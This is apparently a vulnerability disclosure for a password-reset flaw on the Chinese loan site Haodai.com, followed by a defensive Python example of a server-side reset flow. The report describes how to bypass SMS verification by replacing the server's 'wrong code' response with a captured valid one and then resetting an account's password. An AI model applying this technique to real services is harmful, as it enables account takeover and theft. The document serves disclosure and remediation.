Haodai.com (好贷网), a financial website that bills itself as China's largest loan search and service platform, has an arbitrary password reset vulnerability that puts the funds of every user account in the system at risk. Please treat it seriously!
1. This test found a design flaw in the "find password by mobile number" feature: at step 2 (information confirmation) the SMS verification code check can be bypassed.
2. First, run a normal password recovery flow with a known mobile number and record the response returned at step 2 (information confirmation), as follows:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Mar 2015 13:54:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
X-Powered-By: ThinkPHP
Content-Length: 6613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>好贷网 - 找回密码</title>
<link rel="stylesheet" type="text/css" href="/src/c/password/base.css"/>
<link rel="stylesheet" type="text/css" href="/src/c/password/findpwd1.css"/>
<script type="text/javascript" src="/src/j/jquery-1.8.0.min.js"></script>
<script type="text/javascript" src="/src/j/common.js"></script>
<script src="/src/j/home/login_findpwd.js?v=1503102154" type="text/javascript"></script>
</head>
<body>
<div class="re_header">
<div class="head_top auto">
<div class="head_left fl">
<li><a href="http://www.haodai.com" >好贷首页</a></li>
<li><a href="http://www.haodai.com/xiaofei/" >消费贷款</a></li>
<li><a href="http://www.haodai.com/qiye/">企业贷款</a></li>
<li><a href="http://www.haodai.com/gouche/" >购车贷款</a></li>
<li><a href="http://www.haodai.com/goufang/" >购房贷款</a></li>
<li><a href="http://www.haodai.com/zixun/" >贷款资讯</a></li>
<li><a href="http://www.haodai.com/wenda/">贷款问答</a></li>
<div class="clear"></div>
</div>
<div class="head_right fr">好贷网,好贷款!
客服热线:<strong>400-8055-855</strong></div>
<div class="clear"></div>
</div>
</div>
<div class="re_main">
<div class="top clearfix wrap">
<a class="left mr" href="http://www.haodai.com"><img src="/src/i/logo.png" width="88" height="82" /></a>
<div class="left mima">
<!-- <span class="zhoahui">信贷员找回密码</span><br /> <span class="find">Find Password</span>-->
<span><a class="left mr" href="http://www.haodai.com/ajax/getpasswd"><img src="/../src/i/wenda/zhaohui.jpg" width="199" height="67" /></a></span>
</div>
</div>
<div class="mainr">
<div class="mat01">
<div class="mat01_left"></div>
<div class="mar01_center">
<!--找回密码第一步-->
<div class="box clearfix wrapper">
<ul class="box-ul clearfix">
<li class="one-mo left"><a class="current">1.输入登录名</a></li>
<li class="two-que-que left"><a class="current">2.信息确认</a></li>
<li class="three-chong-zhi left"><a class="current">3.重置密码</a></li>
<li class="four-gai left"><a>4.密码修改成功</a></li>
</ul>
<form class="clearfix findpwd3" action="/ajax/getpasswd/act/success" method="post" onsubmit="return czmm();">
<div class="clearfix">
<div class="left">
<label>输入新密码:</label><br />
<input id="pwdid" name="pwd" type="password" class="text1" value="" onfocus="pdmm(this, 'retImgpwd1');" onblur="pdmm(this, 'retImgpwd1');"/>
</div>
<div id="retImgpwd1" class="left"></div><br/>
</div>
<div class="clearfix">
<div class="left">
<label>确认新密码:</label><br />
<input id="pwdid1" name="pwd1" type="password" class="text2" value="" onfocus="pdmm(this, 'retImgpwd2');" onblur="pdmm(this, 'retImgpwd2');"/>
</div>
<div id="retImgpwd2" class="left"></div><br />
</div>
<input type="submit" class="button" value="提交" />
</form>
</div>
<!--密码修改成功第四步-->
</div>
<div class="mat01_right"></div>
<div class="clear"></div>
</div>
</div>
</div>
<div class="bottom wide">
<!--信贷员底部图-->
<div class="bottom" style="height: 1px;border-top: 1px solid #d0d0d0;width:100%">
<div class="foot">
<p class="footp1">好贷网一站式贷款搜索平台,免费为您提供各大银行、小贷公司、典当行的正规贷款,各类个人贷款、个人信用贷款、个人抵押贷款、企业信用贷款、企业抵押贷款任你选。</p>
<p class="footp2"> <a href="http://www.haodai.com/wenzhang/about/cate_id/1" target="_blank" rel="nofollow">关于好贷</a> <span>|</span> <a href="http://www.haodai.com/xdy/login/register" target="_blank" rel="nofollow">信贷员免费注册</a> <span>|</span> <a id="footer_calc" href='http://www.haodai.com/calc/' target="_blank">贷款计算器</a><span>|</span> <a href="http://www.haodai.com/wenzhang/about/cate_id/6" target="_blank" rel="nofollow">网站使用条款与声明</a><span>|</span> <a href="http://www.haodai.com/map/" target="_blank">网站地图</a><span>|</span> <a href="http://www.haodai.com/wenzhang/about/cate_id/2" target="_blank" rel="nofollow">联系我们</a> </p>
<p class="footp3">Copyright © 2012-2014 haodai.com All Rights Reserved. 京ICP备11015456号-5 京ICP证110311号 京公网安备11010102001350号</p>
<p class="footplink"> <a id='___szfw_logo___' rel="nofollow" class="bottomIcon cxwz" href='https://search.szfw.org/cert/l/CX20140723008871008561' target='_blank'></a> <script type='text/javascript'>(function(){document.getElementById('___szfw_logo___').oncontextmenu = function(){return false;}})();</script> </p>
</div>
</div>
</div>
</body>
</html>
3. Run the password recovery flow a second time, as in the screenshot below: enter the mobile number and the CAPTCHA, and the SMS verification code is sent.
4. At step 2, enter an arbitrary SMS code (here 123456); the returned response reports that the SMS code is wrong.
5. Replace that response with the response captured from the first password reset operation, as shown below.
6. Release the request; the reset-password page appears, and the password is reset to 333eee.
7. The reset succeeds, and the new password logs in to the system.
Remediation: strengthen the authentication mechanism and validate on both the front end and the server. In particular, the server must record that the SMS code was actually verified for this reset session and check that record before accepting the final reset request (the form that posts to /ajax/getpasswd/act/success), rather than trusting that the client reached step 3 because it rendered the step-3 page.
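The following is an added illustration of a reset flow with the server-side state the remediation calls for; it is not Haodai's code and does not use ThinkPHP. The phone number, SMS codes, passwords, lifetimes, the 8-character minimum and the SHA-256 demo hash are all constructed assumptions. Each step is keyed to a server-held session record, so a client that never passed the SMS check has no reset token and the final step refuses, whatever page the browser happens to display.

```python
"""Server-side password-reset state machine (added illustration, not Haodai's code).

Every step is bound to a server-held session record. Phone numbers, codes,
passwords and policy constants below are constructed sample values.
"""
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300     # assumed SMS code lifetime
TOKEN_TTL_SECONDS = 600    # assumed reset-token lifetime after a successful code check
MAX_CODE_ATTEMPTS = 5      # assumed lockout threshold for wrong codes


class ResetError(Exception):
    """Raised when a step is attempted out of order or with bad input."""


class PasswordResetService:
    def __init__(self, users, now=time.time):
        self.users = users          # {phone: password_hash}
        self.now = now              # injectable clock for tests
        self.sessions = {}          # session_id -> state dict held only on the server

    @staticmethod
    def hash_password(pw):
        # Demo hash only; a production system would use a slow password hash.
        return hashlib.sha256(pw.encode()).hexdigest()

    def begin_reset(self, phone):
        # Step 1: generate the SMS code server-side and tie it to a fresh session.
        # The code is returned here only so the demo can run offline; in a real
        # system it goes to the SMS gateway, never back to the HTTP client.
        if phone not in self.users:
            raise ResetError("unknown account")
        session_id = secrets.token_urlsafe(16)
        code = f"{secrets.randbelow(1_000_000):06d}"
        self.sessions[session_id] = {
            "phone": phone,
            "code": code,
            "code_expires": self.now() + CODE_TTL_SECONDS,
            "attempts": 0,
            "reset_token": None,    # set only after the code is verified
            "token_expires": 0.0,
        }
        return session_id, code

    def confirm_code(self, session_id, submitted_code):
        # Step 2: verify on the server and, only on success, mint a single-use token.
        # The client never asserts "verified"; it can only present the token later.
        s = self._session(session_id)
        if self.now() > s["code_expires"]:
            raise ResetError("code expired")
        if s["attempts"] >= MAX_CODE_ATTEMPTS:
            raise ResetError("too many attempts")
        s["attempts"] += 1
        if not hmac.compare_digest(s["code"].encode(), submitted_code.encode()):
            raise ResetError("wrong code")
        s["reset_token"] = secrets.token_urlsafe(32)
        s["token_expires"] = self.now() + TOKEN_TTL_SECONDS
        return s["reset_token"]

    def set_password(self, session_id, reset_token, new_password, confirm_password):
        # Step 3: the reset endpoint trusts its own record, not the page the client is on.
        s = self._session(session_id)
        if s["reset_token"] is None:
            raise ResetError("SMS code not verified for this session")
        if self.now() > s["token_expires"]:
            raise ResetError("reset token expired")
        if not hmac.compare_digest(s["reset_token"].encode(), reset_token.encode()):
            raise ResetError("bad reset token")
        if new_password != confirm_password or len(new_password) < 8:
            raise ResetError("password rejected")
        self.users[s["phone"]] = self.hash_password(new_password)
        del self.sessions[session_id]   # token and session are single-use
        return True

    def _session(self, session_id):
        try:
            return self.sessions[session_id]
        except KeyError:
            raise ResetError("no such reset session") from None


def demo():
    """Walk the flow once; returns which checks held (constructed sample data)."""
    svc = PasswordResetService({"13800000000": PasswordResetService.hash_password("old-pass-1")})
    results = {}
    # Legitimate flow: step 1 -> step 2 with the real code -> step 3.
    sid, code = svc.begin_reset("13800000000")
    token = svc.confirm_code(sid, code)
    results["normal_flow"] = svc.set_password(sid, token, "new-pass-123", "new-pass-123")
    results["password_updated"] = svc.users["13800000000"] == PasswordResetService.hash_password("new-pass-123")
    # Reusing the consumed session must fail: the token is single-use.
    try:
        svc.set_password(sid, token, "again-pass-1", "again-pass-1")
        results["token_single_use"] = False
    except ResetError:
        results["token_single_use"] = True
    # Jumping straight to step 3 without passing step 2: no token exists, so it refuses.
    sid2, code2 = svc.begin_reset("13800000000")
    try:
        svc.set_password(sid2, "", "other-pass-1", "other-pass-1")
        results["skip_step2_blocked"] = False
    except ResetError:
        results["skip_step2_blocked"] = True
    # A wrong code at step 2 does not mint a token either.
    wrong = "000000" if code2 != "000000" else "000001"
    try:
        svc.confirm_code(sid2, wrong)
        results["wrong_code_blocked"] = False
    except ResetError:
        results["wrong_code_blocked"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the design is that the only thing the client can contribute to step 3 is a token the server itself issued in step 2; substituting a response body on the client side changes what the browser renders but not what the server's session record says.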